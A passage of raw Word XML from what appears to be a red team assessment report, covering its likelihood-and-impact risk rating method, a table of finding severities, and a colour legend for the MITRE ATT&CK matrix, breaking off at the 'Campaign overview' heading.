    <w:p w14:paraId="17EE60C1" w14:textId="77777777" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The l</w:t>
      </w:r>
      <w:r w:rsidR="00D5013B" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">ikelihood considers elements such as the </w:t>
      </w:r>
      <w:r w:rsidR="00F86C1B" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">required attacker </w:t>
      </w:r>
      <w:r w:rsidR="00D5013B" w:rsidRPr="001019D3">
        <w:t>skill level, ease of discovery, and exploitability of a vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00F86C1B" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D5013B" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C26C64" w14:textId="0B500577" w:rsidR="00F86C1B" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The i</w:t>
      </w:r>
      <w:r w:rsidR="00D5013B" w:rsidRPr="001019D3">
        <w:t>mpact measures the potential technical and business consequences if the threat is realized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAADDB0" w14:textId="00383007" w:rsidR="00D5013B" w:rsidRPr="001019D3" w:rsidRDefault="00D5013B" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>By combining these factors, the model produces a risk rating, which guides security teams in making informed decisions about mitigation priorities. This approach provides a consistent, repeatable method for comparing risks, improving transparency in risk management, and aligning security efforts with business objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD3E824" w14:textId="50BBD58D" w:rsidR="00F86C1B" w:rsidRPr="001019D3" w:rsidRDefault="00F86C1B" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact and Likelihood are based on the Red Team’s observation and knowledge of the </w:t>
      </w:r>
      <w:r w:rsidR="00EF3370" w:rsidRPr="001019D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>targeted system in scop</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>e. This may or may not align with the actual “</w:t>
      </w:r>
      <w:r w:rsidR="00B86891" w:rsidRPr="001019D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">isk </w:t>
      </w:r>
      <w:r w:rsidR="00B86891" w:rsidRPr="001019D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ssessment” performed by the system owner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662D0834" w14:textId="3A990AA5" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The following ratings and colour code are used to define the </w:t>
      </w:r>
      <w:r w:rsidR="00B86891" w:rsidRPr="001019D3">
        <w:t>risk level</w:t>
      </w:r>
      <w:r w:rsidR="004A6BBF" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> of findings</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, which can be found in the management summary and in chapter 4. They represent the urgency to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>take action</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="852"/>
        <w:gridCol w:w="2240"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF3370" w:rsidRPr="001019D3" w14:paraId="337337B3" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68A0A8D3" w14:textId="77777777" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7679A31B" w14:textId="77777777" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3370" w:rsidRPr="001019D3" w14:paraId="513D940A" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A50021"/>
          </w:tcPr>
          <w:p w14:paraId="662C8F4A" w14:textId="77777777" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5681EBBD" w14:textId="77777777" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Immediate action required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3370" w:rsidRPr="001019D3" w14:paraId="73D8AC36" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="4265306E" w14:textId="77777777" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EFFBBE9" w14:textId="77777777" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Urgent action required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3370" w:rsidRPr="001019D3" w14:paraId="64EE1939" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="5A539A43" w14:textId="77777777" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5451E5EA" w14:textId="77777777" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ction required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3370" w:rsidRPr="001019D3" w14:paraId="010157BF" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
          </w:tcPr>
          <w:p w14:paraId="1D4A8A08" w14:textId="77777777" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F9E2514" w14:textId="77777777" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="004A6BBF">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Action advised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="740EF82D" w14:textId="7761CAD7" w:rsidR="00EF3370" w:rsidRPr="001019D3" w:rsidRDefault="00EF3370" w:rsidP="00EF3370">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc209809079"/>
      <w:bookmarkStart w:id="92" w:name="_Toc211963076"/>
      <w:bookmarkStart w:id="93" w:name="_Toc213253594"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Ratings used for findings.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="52F841F5" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00D51507">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc212654640"/>
      <w:bookmarkStart w:id="95" w:name="_Toc213253546"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>MITRE ATT&amp;ACK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="1907405A" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>MITRE ATT&amp;CK matrix is composed of 14 tactics (TA) where each TA has several Techniques (T). Each test performed in the campaign can be mapped to one or more techniques (T). Colours are used to show if the attacks were successful or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463C8932" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="00A1621A">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The following table shows the meaning of the colours used in the MITRE ATT&amp;CK matrix found in chapter 3:</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8"/>
        <w:gridCol w:w="7742"/>
      </w:tblGrid>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="3ED2702F" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="998" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="1B682E77" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Colour </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7742" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="06CB42E8" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tableheadings"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="0ECC7022" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="998" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
          </w:tcPr>
          <w:p w14:paraId="2A2693DE" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7742" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2503687E" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technique launched against the target failed, the target is well protected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="63E400F2" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="998" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="53F69155" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7742" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35324092" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technique launched against the target succeeded, the target is vulnerable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="44394A6B" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="998" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="3D0530EF" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7742" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B3325AE" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technique was not launched against any target as another technique succeeded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="3D6324BB" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="998" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="64E8CC47" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7742" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51F19EBA" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technique was not launched against the target, but it was identified as possibly successful.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0532" w:rsidRPr="001019D3" w14:paraId="335C1F0C" w14:textId="77777777" w:rsidTr="004A6BBF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="998" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1F84E7A3" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7742" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48B7198D" w14:textId="77777777" w:rsidR="000C0532" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technique was not launched against the target as it was either not applicable, out of scope, not authorised.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="308B2620" w14:textId="756F0147" w:rsidR="000920D5" w:rsidRPr="001019D3" w:rsidRDefault="000C0532" w:rsidP="006D2C8C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc211963077"/>
      <w:bookmarkStart w:id="97" w:name="_Toc213253595"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: MITRE ATT&amp;CK matrix colour meaning.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="2CBB3CFD" w14:textId="6A61446E" w:rsidR="006D2C8C" w:rsidRPr="001019D3" w:rsidRDefault="006D2C8C" w:rsidP="000920D5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7844774E" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc212654641"/>
      <w:bookmarkStart w:id="99" w:name="_Ref207792414"/>
      <w:bookmarkStart w:id="100" w:name="_Toc213253547"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Campaign overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="6DCF3BAC" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00E76B76">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
